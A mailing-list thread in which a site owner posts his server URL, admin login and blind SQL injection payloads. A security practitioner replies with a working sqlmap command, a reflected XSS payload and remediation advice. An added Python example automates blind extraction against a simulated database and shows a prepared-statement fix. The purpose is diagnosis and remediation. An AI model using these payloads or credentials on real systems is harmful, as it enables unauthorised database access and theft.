Hi Guy

This is indeed a valid vulnerability.

If we take the following request:

POST /trk/lpg/index.php HTTP/1.1
Host: myimg.co
Cookie: PHPSESSID=yourID

from_date=2013-05-21&to_date=2013-05-23&campaign_id=11'5*CA-PTV*Keyword*********&crap=&submit=submit&stage=2

Then we receive a response which includes the following:

You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'5
            AND clicks.ViewDate > '2013-05-21'
            AND clicks.View' at line 10

Notice the apostrophe included in the campaign_id.  This breaks the SQL
syntax and proves that we have error based SQL injection.  You should not
output DBMS error messages to the client, although simply disabling this
will not remove the issue, because there are other, blind, techniques that
we can use (e.g. time based etc.)  The above does prove the concept, the
issue is there.

In terms of making it work with SQLMap, the following should work:

1) Save the entire HTTP request into a file, for the purposes of this
demonstration I've saved it to a file called REQUEST in the same directory
as SQLMap.
2) Edit the file so that campaign_id is just an integer, e.g. 115
3) Use the following command:

python sqlmap.py -r REQUEST -p campaign_id --suffix "*CA-PTV*Keyword**********" -f -b

You can replace the -f and -b with whatever it is you're trying to get at,
e.g. --dbs to list the databases available to that DBMS user.

The problem you were having probably arose from the fact that the injection
point is mid value, so you needed to provide the rest of the expected value
to create "valid" requests.

To fix this issue, you need to be using prepared statements, so for PHP
see, for example: http://php.net/manual/en/pdo.prepare.php

Finally, as an aside, you also have (reflected) Cross Site Scripting
issues.  If you insert script tags into the three primary POST values (i.e.
from_date, to_date and campaign_id) the page response doesn't encode the
output and so you can have a request such as:

from_date=2013-05-21<script>alert(123)</script>&to_date...

and the page will respond with:

<b>Date Range: </b> 2013-05-21<script>alert(123)</script> ---
2013-05-23<br>....etc.

Bearing all of the above in mind, your remediation priority should be:

1) Use prepared statements for all SQL queries in order to get rid of SQL
injection
2) Output encode all content returned to the client in a manner appropriate
for the context of that output (e.g. encoding for output that will end up
as normal HTML will differ from encoding output that appears in an existing
JS block).  This will get rid of most XSS.
3) Stop outputting DBMS error messages to the client.  It's fine to save
these to a file above the web root.

Well, that's my gratis work done for the year :)

Hope it helped.

Regards

Chris Oakley



On 23 May 2013 00:53, Guy Dufour <yamah...@gmail.com> wrote:

> My script is installed on http://myimg.co/trk/lpg/
> login " admin ", password " hello "
>
> A security advisor told me that it's injectable while being logged in
> manually by modifying the POST param "campaign_id"
>
> Example:
> Change " 129*US-LP-PPV*PPV********* " to :
> 129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
>
> 121
>
>
> 129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
>
> 105
>
>
> 129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
>
> 103
>
> 129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
>
> 111
>
> 129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
>
> 95
>
> 129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
>
> 112
>
>
> 129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
>
> 118
>
>
> This gives database name =  myimgco_cpv
>
>
> However I can't seem to be able to make this work in SQLmap..
>
> Do you guys have any idea? You can try to reproduce this on my server,
> without breaking anything please :)
>
>
> Thanks a lot!
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
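An added example to go with the thread above; it is not Guy's script, Chris's sqlmap command or any sqlmap code. It simulates the injectable handler both messages describe, automates the boolean-based blind extraction Guy did by hand (his single threshold guess per character becomes a binary search, seven requests per character), reproduces the error-based check Chris used, and shows the prepared-statement fix he recommends. Assumptions, none of which the thread confirms: the app splits campaign_id on '*', drops the first segment into the query unquoted and rejects requests with too few segments (that last rule is why the injection point is "mid value" and sqlmap needs --suffix); an in-memory SQLite database stands in for MySQL, with ascii(), substring() and database() emulated so the thread's MySQL payloads run unchanged; the clicks table, its rows and the hidden database name are constructed for the demo.

```python
"""Simulated injectable campaign report, blind extraction, and the fix.
Added example, not code from the thread.  SQLite stands in for MySQL."""
import sqlite3

DB_NAME = "myimgco_cpv"  # constructed: stands in for MySQL's database()


def make_db():
    conn = sqlite3.connect(":memory:")
    # Emulate the MySQL functions the thread's payloads rely on.  This is the
    # test rig, not part of the application being modelled.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3, lambda s, i, n: s[i - 1:i - 1 + n])
    conn.create_function("database", 0, lambda: DB_NAME)
    conn.execute("CREATE TABLE clicks (CampaignID INTEGER, ViewDate TEXT)")
    # Constructed rows: campaign 129 has exactly one click inside the range.
    conn.executemany("INSERT INTO clicks VALUES (?, ?)",
                     [(129, "2013-05-22"), (11, "2013-05-22"),
                      (129, "2013-06-01")])
    return conn


def vulnerable_report(conn, from_date, to_date, campaign_id):
    # Assumed app behaviour: "129*US-LP-PPV*PPV*********" is split on '*',
    # the first segment is concatenated unquoted, and a value with too few
    # segments is rejected, so an injected value must carry the suffix.
    parts = campaign_id.split("*")
    if len(parts) < 4:
        raise ValueError("malformed campaign_id")
    sql = ("SELECT COUNT(*) FROM clicks WHERE clicks.CampaignID = %s "
           "AND clicks.ViewDate > '%s' AND clicks.ViewDate < '%s'")
    return conn.execute(sql % (parts[0], from_date, to_date)).fetchone()[0]


def fixed_report(conn, from_date, to_date, campaign_id):
    # Chris's remediation: a prepared statement.  The segment is bound as a
    # parameter, so it is only ever compared as a value, never parsed as SQL.
    # Whitelisting the segment as digits-only would be a sensible second layer.
    parts = campaign_id.split("*")
    if len(parts) < 4:
        raise ValueError("malformed campaign_id")
    sql = ("SELECT COUNT(*) FROM clicks WHERE clicks.CampaignID = ? "
           "AND clicks.ViewDate > ? AND clicks.ViewDate < ?")
    return conn.execute(sql, (parts[0], from_date, to_date)).fetchone()[0]


def dbms_error_for(handler, conn):
    """Chris's error-based check: a stray apostrophe inside the campaign id.
    Returns the DBMS error text (what the app echoed to the client) or None."""
    try:
        handler(conn, "2013-05-21", "2013-05-23", "11'5*CA-PTV*Keyword*********")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def oracle(handler, conn, condition):
    """Guy's payload shape.  True when the report still finds clicks."""
    payload = "129 and %s*p*ts'*********" % condition
    return handler(conn, "2013-05-21", "2013-05-23", payload) > 0


def extract(handler, conn, expr, max_len=32):
    """Recover expr one character at a time via ascii(substring(expr,pos,1)).

    Binary search over 0..127 (7 requests per character); stops when
    substring() runs off the end, since ascii('') is 0 in MySQL and here.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "ascii(substring((%s),%d,1))>%d" % (expr, pos, mid)
            if oracle(handler, conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("error leaked:", dbms_error_for(vulnerable_report, db) is not None)
    print("vulnerable  :", extract(vulnerable_report, db, "SELECT database()"))
    print("fixed       :", repr(extract(fixed_report, db, "SELECT database()")))
```

Against vulnerable_report the extraction recovers the full name Guy obtained, and the apostrophe probe surfaces a DBMS error. Against fixed_report the same payloads return zero rows for every condition, so the oracle never answers true and extraction yields nothing, and the apostrophe probe produces no error at all; nothing about the payload changed, only that the value is bound rather than concatenated.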